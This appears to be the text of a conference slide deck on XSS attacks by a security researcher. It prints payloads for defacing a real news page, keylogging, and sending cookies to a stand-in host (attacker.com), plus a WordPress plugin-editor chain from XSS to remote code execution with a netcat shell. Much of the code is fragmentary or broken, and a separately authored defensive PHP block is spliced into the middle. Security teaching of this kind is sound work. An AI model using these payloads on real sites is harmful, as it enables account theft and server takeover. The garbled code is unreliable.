For The Win!: @brutelogic
by @brutelogic
Whoami
● Security Researcher at Sucuri Security (a GoDaddy company)
● Currently developing/maintaining KNOXSS, an online XSS tool
Agenda
● Fast Intro to XSS
● Dangers of XSS
○ Virtual Defacement
○ Account Stealing
○ XSS Worm
○ CMS Pwnage
● Miscellaneous
Fast Intro to XSS
Definition
$username = $_GET["user"];
● Server based: the attack comes in the server's response (99.99% of the time in the page source), either directly with the input (reflected) or indirectly through a previously saved input (stored);
● Client based: the rogue input is handled by the page's own native JavaScript code and gets executed directly or indirectly in the same way as above. Aka DOM-based XSS.
Dangers of XSS
Virtual Defacement
Let’s take the blue pill.
Virtual Defacement
<iframe onload="parent.frames[0].document.getElementsByTagName('h1')[1].innerHTML='Prejuizo! Hacker conhecido como \'Brute Logic\' rouba verdadeira fortuna de jornalista global'"
style="border:0;position:absolute;top:0;left:0;right:0;bottom:0;width:100%;height:100%"
src="//www.tribunahoje.com/noticia/148537/entretenimento/2015/07/17/prejuizo-hacker-rouba-verdadeira-fortuna-de-jornalista-global.html">
LSD
Leakage, Spying and Deceiving
Trust no one.
LSD - Leakage, Spying and Deceiving
● Leakage: any private info accessible by JS is easily exfiltrated
Keylogging with XSS

document.onkeypress = function(e) {
    get = window.event?event:e;
    key = get.keyCode?get.keyCode:get.charCode;
    key = String.fromCharCode(key);
    keys += key;
} }, 1000);

$ cat k.php
<?php
$k = $_GET["k"];
if (!empty(k)) { }
Account Stealing
● Unprotected password/email/phone number change functionality can be abused to compromise an account
Short JS code to steal cookies:
fetch('//attacker.com/?cookie='+document.cookie)
Unprotected password change in wordpress.com
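As an added example that is not part of the original talk, the reflected pattern from the Definition slide ($username = $_GET["user"];) beside a hardened version, plus the cookie flags that blunt the document.cookie one-liner above. Assumptions: the value is echoed into an HTML body and an attribute, and PHP 7.3 or later (for the array form of session_set_cookie_params).

```php
<?php
// Added example (not from the talk). Assumed: "user" is echoed into an HTML
// body and into a quoted attribute value.

// Vulnerable: the raw query-string value is concatenated into the response,
// so angle brackets or an on* attribute in it become markup the browser runs.
function render_greeting_vulnerable(string $username): string
{
    return '<h1>Hello, ' . $username . '</h1>';
}

// Hardened: encode for the HTML context at the point of output.
// ENT_QUOTES also encodes ' and " so the same helper is safe inside a quoted
// attribute; ENT_SUBSTITUTE avoids an empty result on invalid UTF-8.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_greeting_safe(string $username): string
{
    return '<h1>Hello, ' . html_escape($username) . '</h1>'
         . '<input name="user" value="' . html_escape($username) . '">';
}

// Defence in depth against cookie exfiltration: a session cookie that
// JavaScript cannot read, so document.cookie does not contain it.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'httponly' => true,   // not exposed to document.cookie
        'secure'   => true,   // only sent over HTTPS
        'samesite' => 'Lax',  // not sent on most cross-site requests
    ]);
    session_start();
}

start_hardened_session();
$username = $_GET["user"] ?? '';   // as on the slide, with a default for a missing parameter
echo render_greeting_safe($username);
```

Encoding is context-specific: the helper above covers HTML body and attribute values only, and a value placed inside a script block or a URL needs a different encoder.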
Memory Corruption Vector
Welcome to my box.
Memory Corruption Vector
p = '/wordpress/wp-admin/plugin-editor.php?';
q = 'file=hello.php';
// first request to the plugin editor (the open() call is not shown on the slide)
a = new XMLHttpRequest();
a.send();
// second request posts a form-encoded body; the body itself ($) is not shown on the slide
b = new XMLHttpRequest();
b.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
b.send($);
Wordpress 4.8 - XSS to RCE
● Executing payload by firing a request
b.onreadystatechange = function(){
    // once the second request completes, request the written plugin file
    if (this.readyState == 4) {
        fetch('/wordpress/wp-content/plugins/hello.php');
    }
}
Opening a netcat shell after triggering a stored XSS in WP
Miscellaneous
2. Denial of Service
● References
http://brutelogic.com.br/blog
http://brutelogic.com.br/cheatsheet
https://youtu.be/i8mTYicEQrI
https://youtu.be/26V01iIjeGk
Thank You!
#hack2learn